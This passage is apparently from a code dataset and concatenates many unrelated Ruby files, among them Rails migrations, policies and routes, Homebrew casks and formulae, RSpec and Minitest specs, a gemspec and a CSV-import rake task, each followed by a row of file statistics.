"#{@chef.titleize} has made #{@quantity} #{@type.pluralize}!"
end
def make_more
@chef.bake(self)
end
end
| 17.15 | 65 | 0.64723 |
ff5a1e892144aa00fc418f176aa6fc02ef0c620c | 410 | require 'gems'
module Gemmies
class AddWebhook < Services::Base
IGNORED_ERROR_MESSAGE = /has already been registered/
def call(gemmy)
return unless Gems.key.present?
begin
Gems.add_web_hook gemmy.name, api_releases_url
rescue Gems::GemError => error
unless IGNORED_ERROR_MESSAGE.match?(error.message)
raise error
end
end
end
end
end
| 20.5 | 58 | 0.663415 |
e8a7b9f82ef0882b92f140218ac631fd150b2cdc | 335 | if ENV['PROVISIONED_USERNAME'] == 'root'
PROVISIONED_DIRECTORY = '/root'
else
PROVISIONED_DIRECTORY = "/home/#{ENV['PROVISIONED_USERNAME']}"
end
remote_file "#{PROVISIONED_DIRECTORY}/.vimrc" do
source ENV['VIMRC_FILE']
content 'Copy Vim config file'
owner ENV['PROVISIONED_USERNAME']
group ENV['PROVISIONED_USERNAME']
end
| 25.769231 | 64 | 0.746269 |
6a5be4ae250487f0b658ae58159d3de137fb52e9 | 629 | [
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 50},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 7},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 10},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 5},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 2},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 4},
{:test_field1 => 'Test Value 1', :test_field2 => "Test Value 2", :test_field3 => 24}
]
| 62.9 | 89 | 0.605723 |
f82d865cbf3126536a88b90efca8e10aa0ac6abb | 155 | class CreatePhotos < ActiveRecord::Migration[5.2]
def change
create_table :photos do |t|
t.string :image
t.timestamps
end
end
end
| 15.5 | 49 | 0.658065 |
bf2accea0985af82c4595a3bd06fdf85dc194fad | 808 | class PessoaPolicy < ApplicationPolicy
def index?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def show?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def new?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def edit?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def create?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def update?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
def destroy?
user.admin? || user.pedagogx? || user.psicologx? || user.assistente_social?
end
class Scope < Scope
def resolve
scope
end
end
end
| 21.837838 | 79 | 0.662129 |
2665df2440ace00f0074c3a70614915eb03f44d6 | 218 | # Copyright (c) 2019 Danil Pismenny <[email protected]>
# frozen_string_literal: true
# Load the Rails application.
require_relative 'application'
# Initialize the Rails application.
Rails.application.initialize!
| 21.8 | 57 | 0.798165 |
4a19981466959cae1052c27933dff46c7f662c2b | 675 | cask 'duet' do
version '2.1.0.8'
sha256 '7193d0753f03993f8c7250e4c868aea9c7f54265514aae864a5798b1f07588ae'
# duet.nyc3.cdn.digitaloceanspaces.com/Mac was verified as official when first introduced to the cask
url "https://duet.nyc3.cdn.digitaloceanspaces.com/Mac/#{version.major_minor.dots_to_underscores}/duet-#{version.dots_to_hyphens}.zip"
appcast 'https://macupdater.net/cgi-bin/check_urls/check_url_redirect.cgi?url=https://updates.duetdisplay.com/latestMac',
configuration: version.dots_to_hyphens
name 'Duet'
homepage 'https://www.duetdisplay.com/'
auto_updates true
app 'duet.app'
uninstall kext: 'com.karios.driver.DuetDisplay'
end
| 37.5 | 135 | 0.777778 |
01dff358973f66343f8d7d0bdb4d60f6105f637a | 1,848 | require 'spec_helper'
describe Spree::PromotionCodeBatchJob, type: :job do
let(:email) { "[email protected]" }
let(:promotion_code_batch) do
Spree::PromotionCodeBatch.create!(
promotion_id: create(:promotion).id,
base_code: "test",
number_of_codes: 10,
email: email
)
end
context "with a successful build" do
before do
allow(Spree::PromotionCodeBatchMailer)
.to receive(:promotion_code_batch_finished)
.and_call_original
end
context "with an email address" do
it "sends an email" do
subject.perform(promotion_code_batch)
expect(Spree::PromotionCodeBatchMailer)
.to have_received(:promotion_code_batch_finished)
end
end
context "with no email address" do
let(:email) { nil }
it "sends an email" do
subject.perform(promotion_code_batch)
expect(Spree::PromotionCodeBatchMailer)
.to_not have_received(:promotion_code_batch_finished)
end
end
end
context "with a failed build" do
before do
allow_any_instance_of(Spree::PromotionCode::BatchBuilder)
.to receive(:build_promotion_codes)
.and_raise("Error")
allow(Spree::PromotionCodeBatchMailer)
.to receive(:promotion_code_batch_errored)
.and_call_original
expect { subject.perform(promotion_code_batch) }
.to raise_error RuntimeError
end
context "with an email address" do
it "sends an email" do
expect(Spree::PromotionCodeBatchMailer)
.to have_received(:promotion_code_batch_errored)
end
end
context "with no email address" do
let(:email) { nil }
it "sends an email" do
expect(Spree::PromotionCodeBatchMailer)
.to_not have_received(:promotion_code_batch_errored)
end
end
end
end
| 28 | 63 | 0.669372 |
1aa11be3639c5909826a78c794895323e24b6dc0 | 50 | module RoadieActionmailer
VERSION = "0.0.1"
end
| 12.5 | 25 | 0.74 |
d585bfe42803d70a4c547daac0f2526319a0614d | 1,471 | cask "microsoft-edge" do
folder = Hardware::CPU.intel? ? "C1297A47-86C4-4C1F-97FA-950631F94777" : "03adf619-38c6-4249-95ff-4a01c0ffc962"
linkid = Hardware::CPU.intel? ? "2069148" : "2093504"
version "96.0.1054.43"
if Hardware::CPU.intel?
sha256 "cf229328305f25c91fd1909014f4a50df49a86d968965712ea5d28fad2a504ea"
else
sha256 "307ebca065bd9a4420b0100435e59df0d6dd192c89ec4c166173cf190337a124"
end
url "https://officecdn-microsoft-com.akamaized.net/pr/#{folder}/MacAutoupdate/MicrosoftEdge-#{version}.pkg",
verified: "officecdn-microsoft-com.akamaized.net/"
name "Microsoft Edge"
desc "Web browser"
homepage "https://www.microsoft.com/edge"
livecheck do
url "https://go.microsoft.com/fwlink/?linkid=#{linkid}"
strategy :header_match
end
auto_updates true
depends_on cask: "microsoft-auto-update"
pkg "MicrosoftEdge-#{version}.pkg",
choices: [
{
"choiceIdentifier" => "com.microsoft.package.Microsoft_AutoUpdate.app", # Office16_all_autoupdate.pkg
"choiceAttribute" => "selected",
"attributeSetting" => 0,
},
]
uninstall pkgutil: "com.microsoft.edgemac"
zap trash: [
"~/Library/Application Support/Microsoft Edge",
"~/Library/Caches/Microsoft Edge",
"~/Library/Preferences/com.microsoft.edgemac.plist",
"~/Library/Saved Application State/com.microsoft.edgemac.savedState",
],
rmdir: "/Library/Application Support/Microsoft"
end
| 31.978261 | 113 | 0.706322 |
d51db3e446227dd395d686013160f9ca1e13a403 | 1,099 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'll_pay/version'
Gem::Specification.new do |spec|
spec.name = 'll_pay'
spec.version = LlPay::VERSION
spec.authors = ['houdelin']
spec.email = ['[email protected]']
spec.summary = 'An unofficial lianlian (for apple pay) pay gem.'
spec.description = 'Helping rubyist integration with lianlian pay(lianlianpay llpay) easier.'
spec.homepage = 'https://github.com/bayetech/ll_pay'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(spec|features)/}) } \
- %w(CODE_OF_CONDUCT.md ll-pay.sublime-project Gemfile Rakefile ll_pay.gemspec bin/setup bin/console)
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_runtime_dependency 'http', '>= 1.0.4', '< 5'
spec.add_development_dependency 'rake', '~> 11.3'
spec.add_development_dependency 'rspec', '~> 3.5'
end
| 40.703704 | 105 | 0.652411 |
b9a32a5f7ab41c81f9ebf057dc16e461eb3857fb | 36 | module PsiDisciplineSlotsHelper
end
| 12 | 31 | 0.916667 |
017791f197c052fffb4db284ef67f49cb8a684df | 338 | # frozen_string_literal: true
module Gitlab
module BackgroundMigration
# No op on CE
class MigrateRequirementsToWorkItems
def perform(start_id, end_id)
end
end
end
end
Gitlab::BackgroundMigration::MigrateRequirementsToWorkItems.prepend_mod_with('Gitlab::BackgroundMigration::MigrateRequirementsToWorkItems')
| 24.142857 | 139 | 0.789941 |
39976194fe0e0aac5417abc50ca9ea6a6b86eef1 | 3,296 | namespace :db do
desc "Download latest project list and import csv"
task :update => :environment do
require 'csv'
require 'open-uri'
require 'open_uri_redirections'
puts "Starting import..."
record_count = 0
filename = "http://infrastructure.gc.ca/alt-format/opendata/project-list-liste-de-projets-bil.csv"
CSV.parse(open(filename, 'r:iso-8859-1:utf-8', :allow_redirections => :all){|f| f.read}, headers: true, header_converters: :symbol) do |row|
project_number = row[0]
project_title_en = row[1]
project_title_fr = row[2]
program_title_en = row[5]
program_title_fr = row[6]
category_en = row[7]
category_fr = row[8]
location_en = row[9]
location_fr = row[10]
region = row[11]
approved_date = row[12]
construction_start_date = row[13]
construction_end_date = row[14]
federal_contribution = row[15]
total_eligible_cost = row[16]
ultimate_recipient_en = row[17]
ultimate_recipient_fr = row[18]
forecasted_construction_start_date = row[19]
forecasted_construction_end_date = row[20]
program = Program.find_or_create_by(title_en:program_title_en)
program.title_en = program_title_en
program.title_fr = program_title_fr
program.save!
program_id = Program.find_by(title_en:program_title_en).id
category = Category.find_or_create_by(title_en:category_en)
category.title_en = category_en
category.title_fr = category_fr
category.save!
category_id = Category.find_by(title_en:category_en).id
region_code = Region.find_or_create_by(code:region)
region_code.save!
region_id = Region.find_by(code:region).id
location = Location.find_or_create_by(name_en:location_en, region_id: region_id)
location.name_fr = location_fr
location.save!
location_id = Location.find_by(name_en:location_en, region_id: region_id).id
project = Project.find_or_create_by(number:project_number)
project.title_en = project_title_en
project.title_fr = project_title_fr
project.federal_contribution = federal_contribution
project.total_eligible_cost = total_eligible_cost
project.ultimate_recipient_en = ultimate_recipient_en
project.ultimate_recipient_fr = ultimate_recipient_fr
project.forecasted_construction_start_date = forecasted_construction_start_date
project.forecasted_construction_end_date = forecasted_construction_end_date
project.approved_date = approved_date
project.construction_start_date = construction_start_date
project.construction_end_date = construction_end_date
project.program_id = program_id
project.category_id = category_id
project.location_id = location_id
project.region_id = region_id
project.save!
record_count = record_count + 1
print "#{record_count} project records imported \r"
end
puts "-- "
puts "#{record_count} project records imported"
puts "#{Time.now.strftime("%Y-%m-%d_%H-%M")}"
puts "-- "
update = Update.create(record_count:record_count)
end
end | 34.333333 | 144 | 0.684163 |
6a3db1da30296f4c06a5603f0243e28a26ac3ee6 | 1,905 | require 'spec/preparation'
describe 'A Diakonos::Clipboard' do
it 'can accept new clips via #add_clip' do
c = Diakonos::Clipboard.new( 3 )
c.add_clip( nil ).should.be.false
c.add_clip( [ 'foo' ] ).should.be.true
c.add_clip( [ 'bar' ] ).should.be.true
c.add_clip( [ 'baz' ] ).should.be.true
c[ 2 ].should.equal [ 'foo' ]
c[ 3 ].should.be.nil
c.add_clip( [ 'fiz' ] ).should.be.true
c[ 2 ].should.equal [ 'bar' ]
c[ 3 ].should.be.nil
end
it 'provides access to clips via #[]' do
c = Diakonos::Clipboard.new( 3 )
c[ -1 ].should.be.nil
c[ 0 ].should.be.nil
c[ 1 ].should.be.nil
c.add_clip( nil ).should.be.false
x = [ 'foo' ]
c.add_clip( x ).should.be.true
c[ -1 ].should.equal x
c[ 0 ].should.equal x
c[ 1 ].should.be.nil
end
it 'can be iterated over via #each' do
c = Diakonos::Clipboard.new( 10 )
9.downto( 0 ) do |i|
c.add_clip( [ i.to_s ] )
end
i = 0
c.each do |clip|
clip.should.equal [ i.to_s ]
i += 1
end
end
it 'provides #append_to_clip to append to clips' do
c = Diakonos::Clipboard.new( 10 )
c.append_to_clip( nil ).should.be.false
x = [ 'foo' ]
c.append_to_clip( x ).should.be.true
c.clip.should.equal [ 'foo' ]
c.append_to_clip( [ 'bar', 'baz' ] ).should.be.true
c.clip.should.equal [ 'foo', 'bar', 'baz' ]
y = [ 'line with newline', '' ]
c.add_clip( y ).should.be.true
c.clip.should.equal y
c.append_to_clip( [ 'another line' ] ).should.be.true
c.clip.should.equal [ 'line with newline', 'another line' ]
c.add_clip( [ 'line1', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '' ]
c.append_to_clip( [ '', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '', '' ]
c.append_to_clip( [ 'line2', '' ] ).should.be.true
c.clip.should.equal [ 'line1', '', 'line2', '' ]
end
end | 29.307692 | 63 | 0.571129 |
263d562b7eb014629817f36df9e66dcced2dd7b5 | 2,621 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170330042636) do
create_table "db_people", force: :cascade do |t|
t.string "label"
t.integer "age"
t.integer "height"
t.string "hair_color"
t.string "eye_color"
t.boolean "alive"
t.float "weight"
t.float "mass"
t.string "gender"
t.text "description"
t.string "people_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_places", force: :cascade do |t|
t.string "label"
t.float "latitude"
t.float "longitude"
t.string "zip_code"
t.string "street_number"
t.string "street"
t.float "area"
t.boolean "earth"
t.boolean "space"
t.string "country"
t.string "state"
t.integer "north"
t.integer "south"
t.integer "east"
t.integer "west"
t.integer "up"
t.integer "down"
t.text "description"
t.string "place_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_sessions", force: :cascade do |t|
t.string "sessionId"
t.string "userId"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "db_things", force: :cascade do |t|
t.string "label"
t.float "mass"
t.boolean "edible"
t.boolean "visible"
t.boolean "wearable"
t.boolean "container"
t.boolean "containable"
t.boolean "transportable"
t.boolean "transport"
t.boolean "platform"
t.boolean "platformable"
t.boolean "damageable"
t.boolean "damager"
t.integer "cost"
t.boolean "takeable"
t.boolean "dropable"
t.text "description"
t.string "thing_type"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 30.476744 | 86 | 0.659672 |
1cf08afce7ed3e8592845169eacaf9b3a7e8c3be | 5,430 | class Libbi < Formula
desc "Bayesian state-space modelling on parallel computer hardware"
homepage "https://libbi.org/"
url "https://github.com/libbi/LibBi/archive/1.4.2.tar.gz"
sha256 "17824f6b466777a02d6bc6bb4704749fb64ce56ec4468b936086bc9901b5bf78"
revision 1
head "https://github.com/libbi/LibBi.git"
bottle do
cellar :any_skip_relocation
# sha256 "eac0034e849157b555d5874f995135178dd1da353f0a713572f59d16d72c16af" => :mojave
sha256 "c9188f7283ff75930ce98c042df60151daf553d904f18bceb5c042c702c86978" => :high_sierra
sha256 "2f519a8e7b1b62fb5f6d29d7cee26788891ca658af8aff33f963e75a9c0a59f0" => :sierra
sha256 "32b7b3f955ce2aff321b2ba6ba43e03e11102bb799b7e73c400c2fe3513547bf" => :el_capitan
end
depends_on "automake"
depends_on "boost"
depends_on "gsl"
depends_on "netcdf"
depends_on "qrupdate"
resource "Test::Simple" do
url "https://cpan.metacpan.org/authors/id/E/EX/EXODIST/Test-Simple-1.302133.tar.gz"
sha256 "02bc2b4ec299886efcc29148308c9afb64e0f2c2acdeaa2dee33c3adfe6f96e2"
end
resource "Getopt::ArgvFile" do
url "https://cpan.metacpan.org/authors/id/J/JS/JSTENZEL/Getopt-ArgvFile-1.11.tar.gz"
sha256 "3709aa513ce6fd71d1a55a02e34d2f090017d5350a9bd447005653c9b0835b22"
end
resource "Carp::Assert" do
url "https://cpan.metacpan.org/authors/id/N/NE/NEILB/Carp-Assert-0.21.tar.gz"
sha256 "924f8e2b4e3cb3d8b26246b5f9c07cdaa4b8800cef345fa0811d72930d73a54e"
end
resource "File::Slurp" do
url "https://cpan.metacpan.org/authors/id/U/UR/URI/File-Slurp-9999.19.tar.gz"
sha256 "ce29ebe995097ebd6e9bc03284714cdfa0c46dc94f6b14a56980747ea3253643"
end
resource "Parse::Yapp" do
url "https://cpan.metacpan.org/authors/id/W/WB/WBRASWELL/Parse-Yapp-1.21.tar.gz"
sha256 "3810e998308fba2e0f4f26043035032b027ce51ce5c8a52a8b8e340ca65f13e5"
end
resource "Parse::Template" do
url "https://cpan.metacpan.org/authors/id/P/PS/PSCUST/ParseTemplate-3.08.tar.gz"
sha256 "3c7734f53999de8351a77cb09631d7a4a0482b6f54bca63d69d5a4eec8686d51"
end
resource "Parse::Lex" do
url "https://cpan.metacpan.org/authors/id/P/PS/PSCUST/ParseLex-2.21.tar.gz"
sha256 "f55f0a7d1e2a6b806a47840c81c16d505c5c76765cb156e5f5fd703159a4492d"
end
resource "Parse::RecDescent" do
url "https://cpan.metacpan.org/authors/id/J/JT/JTBRAUN/Parse-RecDescent-1.967015.tar.gz"
sha256 "1943336a4cb54f1788a733f0827c0c55db4310d5eae15e542639c9dd85656e37"
end
resource "Math::Symbolic" do
url "https://cpan.metacpan.org/authors/id/S/SM/SMUELLER/Math-Symbolic-0.612.tar.gz"
sha256 "a9af979956c4c28683c535b5e5da3cde198c0cac2a11b3c9a129da218b3b9c08"
end
resource "YAML::Tiny" do
url "https://cpan.metacpan.org/authors/id/E/ET/ETHER/YAML-Tiny-1.73.tar.gz"
sha256 "bc315fa12e8f1e3ee5e2f430d90b708a5dc7e47c867dba8dce3a6b8fbe257744"
end
resource "File::Remove" do
url "https://cpan.metacpan.org/authors/id/S/SH/SHLOMIF/File-Remove-1.57.tar.gz"
sha256 "b3becd60165c38786d18285f770b8b06ebffe91797d8c00cc4730614382501ad"
end
resource "inc::Module::Install::DSL" do
url "https://cpan.metacpan.org/authors/id/E/ET/ETHER/Module-Install-1.19.tar.gz"
sha256 "1a53a78ddf3ab9e3c03fc5e354b436319a944cba4281baf0b904fa932a13011b"
end
resource "Class::Inspector" do
url "https://cpan.metacpan.org/authors/id/P/PL/PLICEASE/Class-Inspector-1.32.tar.gz"
sha256 "cefadc8b5338e43e570bc43f583e7c98d535c17b196bcf9084bb41d561cc0535"
end
resource "File::ShareDir" do
url "https://cpan.metacpan.org/authors/id/R/RE/REHSACK/File-ShareDir-1.104.tar.gz"
sha256 "07b628efcdf902d6a32e6a8e084497e8593d125c03ad12ef5cc03c87c7841caf"
end
resource "Template" do
url "https://cpan.metacpan.org/authors/id/A/AB/ABW/Template-Toolkit-2.27.tar.gz"
sha256 "1311a403264d0134c585af0309ff2a9d5074b8ece23ece5660d31ec96bf2c6dc"
end
resource "Graph" do
url "https://cpan.metacpan.org/authors/id/J/JH/JHI/Graph-0.9704.tar.gz"
sha256 "325e8eb07be2d09a909e450c13d3a42dcb2a2e96cc3ac780fe4572a0d80b2a25"
end
resource "thrust" do
url "https://github.com/thrust/thrust/releases/download/1.8.2/thrust-1.8.2.zip"
sha256 "00925daee4d9505b7f33d0ed42ab0de0f9c68c4ffbe2a41e6d04452cdee77b2d"
end
def install
ENV.prepend_create_path "PERL5LIB", libexec/"lib/perl5"
resources.each do |r|
r.stage do
next if r.name == "thrust"
# need to set TT_ACCEPT=y for Template library for non-interactive install
perl_flags = "TT_ACCEPT=y" if r.name == "Template"
system "perl", "Makefile.PL", "INSTALL_BASE=#{libexec}", perl_flags
system "make"
system "make", "install"
end
end
(include/"thrust").install resource("thrust")
system "perl", "Makefile.PL", "INSTALL_BASE=#{libexec}", "INSTALLSITESCRIPT=#{bin}"
# Disable dynamic selection of perl which may cause segfault when an
# incompatible perl is picked up.
# See, e.g., https://github.com/Homebrew/homebrew-core/issues/4936
inreplace "script/libbi", "#!/usr/bin/env perl", "#!/usr/bin/perl"
system "make"
system "make", "install"
pkgshare.install "Test.bi", "test.conf"
bin.env_script_all_files(libexec+"bin", :PERL5LIB => ENV["PERL5LIB"])
end
test do
cp Dir[pkgshare/"Test.bi", pkgshare/"test.conf"], testpath
system "#{bin}/libbi", "sample", "@test.conf"
assert_predicate testpath/"test.nc", :exist?
end
end
| 37.708333 | 93 | 0.750645 |
91ab0fa1f4b6467496da55bb18837f34c8ac5d63 | 1,068 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
Message.destroy_all
Chat.destroy_all
ChatApp.destroy_all
5.times do
chat_app = ChatApp.create!(name: Faker::TvShows::SiliconValley.app, token: SecureRandom.uuid)
3.times do |_i|
chat_number = Redix.connection.incr "chat_apps.#{chat_app.token}.chats.number"
chat = Chat.create!(chat_app_id: chat_app.id, name: Faker::TvShows::SiliconValley.invention, number: chat_number)
4.times do |_j|
message_number = Redix.connection.incr "chat_apps.#{chat_app.token}.chats.#{chat.number}.messages.number"
Message.create!(chat_id: chat.id, body: Faker::TvShows::RickAndMorty.quote, number: message_number)
end
end
end
Message.__elasticsearch__.create_index!
Message.import
| 38.142857 | 117 | 0.741573 |
b9ef26ec74fc11db08d0a4016a6fa2c7774ec379 | 377 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module America
module St_Kitts
include TimezoneDefinition
linked_timezone 'America/St_Kitts', 'America/Port_of_Spain'
end
end
end
end
end
| 19.842105 | 69 | 0.649867 |
aba65e57865ae7972b20583ecbbba98fb5749ed8 | 1,627 | class Libomp < Formula
desc "LLVM's OpenMP runtime library"
homepage "https://openmp.llvm.org/"
url "https://releases.llvm.org/8.0.0/openmp-8.0.0.src.tar.xz"
sha256 "f7b1705d2f16c4fc23d6531f67d2dd6fb78a077dd346b02fed64f4b8df65c9d5"
bottle do
cellar :any
sha256 "6c8f66a6582efa00620593e16a41f3649018778a300cc772afbe79c711c2c396" => :mojave
sha256 "4cc6fd69f1558f29165608c3e52aed88be6c56e3b0da10c9f6912ea3345daf3a" => :high_sierra
sha256 "e5d63a6b2cfeb05ded546b5f8d381acc592a2a37767cbae20569981229c66ac8" => :sierra
end
depends_on "cmake" => :build
depends_on :macos => :yosemite
def install
# Disable LIBOMP_INSTALL_ALIASES, otherwise the library is installed as
# libgomp alias which can conflict with GCC's libgomp.
system "cmake", ".", *std_cmake_args, "-DLIBOMP_INSTALL_ALIASES=OFF"
system "make", "install"
system "cmake", ".", "-DLIBOMP_ENABLE_SHARED=OFF", *std_cmake_args,
"-DLIBOMP_INSTALL_ALIASES=OFF"
system "make", "install"
end
test do
(testpath/"test.cpp").write <<~EOS
#include <omp.h>
#include <array>
int main (int argc, char** argv) {
std::array<size_t,2> arr = {0,0};
#pragma omp parallel num_threads(2)
{
size_t tid = omp_get_thread_num();
arr.at(tid) = tid + 1;
}
if(arr.at(0) == 1 && arr.at(1) == 2)
return 0;
else
return 1;
}
EOS
system ENV.cxx, "-Werror", "-Xpreprocessor", "-fopenmp", "test.cpp",
"-L#{lib}", "-lomp", "-o", "test"
system "./test"
end
end
| 33.204082 | 93 | 0.634296 |
d56eea80489bc97192a6d1ad6bdfc8030f7c760c | 2,916 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ActiveJob::Retry::ConstantBackoffStrategy do
let(:strategy) { described_class.new(options) }
describe '#should_retry?' do
subject { strategy.should_retry?(attempt, exception) }
let(:attempt) { 1 }
let(:exception) { RuntimeError.new }
context 'when the limit is infinite' do
let(:options) { { limit: nil, unlimited_retries: true } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(true) }
end
context '99999th attempt' do
let(:attempt) { 99_999 }
it { is_expected.to be(true) }
end
end
context 'when the limit is 0' do
let(:options) { { limit: 0 } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(false) }
end
context '99999th attempt' do
let(:attempt) { 99_999 }
it { is_expected.to be(false) }
end
end
context 'when the limit is 5' do
let(:options) { { limit: 5 } }
context '1st attempt' do
let(:attempt) { 1 }
it { is_expected.to be(true) }
end
context '4th attempt' do
let(:attempt) { 4 }
it { is_expected.to be(true) }
end
context '5th attempt' do
let(:attempt) { 5 }
it { is_expected.to be(false) }
end
end
context 'defaults (retry everything)' do
let(:options) { { limit: 10 } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(true) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(true) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(true) }
end
end
context 'with whitelist' do
let(:options) { { limit: 10, retryable_exceptions: [RuntimeError] } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(false) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(true) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(true) }
end
end
context 'with blacklist' do
let(:options) { { limit: 10, fatal_exceptions: [RuntimeError] } }
context 'Exception' do
let(:exception) { Exception.new }
it { is_expected.to be(true) }
end
context 'RuntimeError' do
let(:exception) { RuntimeError.new }
it { is_expected.to be(false) }
end
context 'subclass of RuntimeError' do
let(:exception) { Class.new(RuntimeError).new }
it { is_expected.to be(false) }
end
end
end
end
| 24.711864 | 75 | 0.576475 |
b959e34acf7c1919c38f8ad979df98d5871eca0c | 811 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'flutter_qr_reader'
s.version = '0.0.1'
s.summary = 'QR code (scan code / picture) recognition (AndroidView/UiKitView)'
s.description = <<-DESC
QR code (scan code / picture) recognition (AndroidView/UiKitView)
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.dependency 'LBXScan'
s.dependency 'LBXZBarSDK'
s.ios.deployment_target = '8.0'
end
| 35.26087 | 100 | 0.583231 |
03db3f276476a661a90a515ac1fe49a1ba957da6 | 3,911 | require 'helper'
require 'time'
require 'net/http'
require 'ddtrace'
require 'ddtrace/contrib/rack/middlewares'
require 'rack/test'
def wait_http_server(server, delay)
delay.times do |i|
uri = URI(server + '/')
begin
res = Net::HTTP.get_response(uri)
return true if res.code == '200'
rescue StandardError => e
puts e if i >= 3 # display errors only when failing repeatedly
end
sleep 1
end
false
end
class RackBaseTest < Minitest::Test
include Rack::Test::Methods
# rubocop:disable Metrics/MethodLength
def app
tracer = @tracer
Rack::Builder.new do
use Datadog::Contrib::Rack::TraceMiddleware
map '/success/' do
run(proc { |_env| [200, { 'Content-Type' => 'text/html' }, 'OK'] })
end
map '/failure/' do
run(proc { |_env| [400, { 'Content-Type' => 'text/html' }, 'KO'] })
end
map '/exception/' do
run(proc { |_env| raise StandardError, 'Unable to process the request' })
end
map '/500/' do
run(proc { |_env| [500, { 'Content-Type' => 'text/html' }, 'KO'] })
end
map '/nomemory/' do
run(proc { |_env| raise NoMemoryError, 'Non-standard error' })
end
map '/app/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.resource = 'GET /app/'
request_span.set_tag('http.method', 'GET_V2')
request_span.set_tag('http.status_code', 201)
request_span.set_tag('http.url', '/app/static/')
[200, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/app/500/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.status = 1
request_span.set_tag('error.stack', 'Handled exception')
[500, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/app/500/no_status/' do
run(proc do |env|
# this should be considered a web framework that can alter
# the request span after routing / controller processing
request_span = env[Datadog::Contrib::Rack::TraceMiddleware::RACK_REQUEST_SPAN]
request_span.set_tag('error.stack', 'Handled exception')
[500, { 'Content-Type' => 'text/html' }, 'OK']
end)
end
map '/leak/' do
handler = proc do
tracer.trace('leaky-span-1')
tracer.trace('leaky-span-2')
tracer.trace('leaky-span-3')
[200, { 'Content-Type' => 'text/html' }, 'OK']
end
run(handler)
end
map '/headers/' do
run(proc do |_env|
response_headers = {
'Content-Type' => 'text/html',
'Cache-Control' => 'max-age=3600',
'ETag' => '"737060cd8c284d8af7ad3082f209582d"',
'Expires' => 'Thu, 01 Dec 1994 16:00:00 GMT',
'Last-Modified' => 'Tue, 15 Nov 1994 12:45:26 GMT',
'X-Request-ID' => 'f058ebd6-02f7-4d3f-942e-904344e8cde5',
'X-Fake-Response' => 'Don\'t tag me.'
}
[200, response_headers, 'OK']
end)
end
end.to_app
end
def setup
super
# store the configuration and use a DummyTracer
@tracer = get_test_tracer
Datadog.configure do |c|
c.tracer hostname: ENV.fetch('TEST_DDAGENT_HOST', 'localhost')
c.use :http
c.use :rack, tracer: @tracer
end
end
def teardown
super
# reset the configuration
Datadog.configuration[:rack].reset_options!
end
end
| 28.547445 | 88 | 0.580926 |
218cefd87e2747a701954efc6825a8923dc8cb14 | 463 | Rails.application.routes.draw do
# For details on the DSL available within this file, see https://guides.rubyonrails.org/routing.html
root to: redirect('/todos')
get 'todos', to: 'site#index'
get 'todos/new', to: 'site#index'
get 'todos/:id/edit', to: 'site#index'
namespace :api do
namespace :v1 do
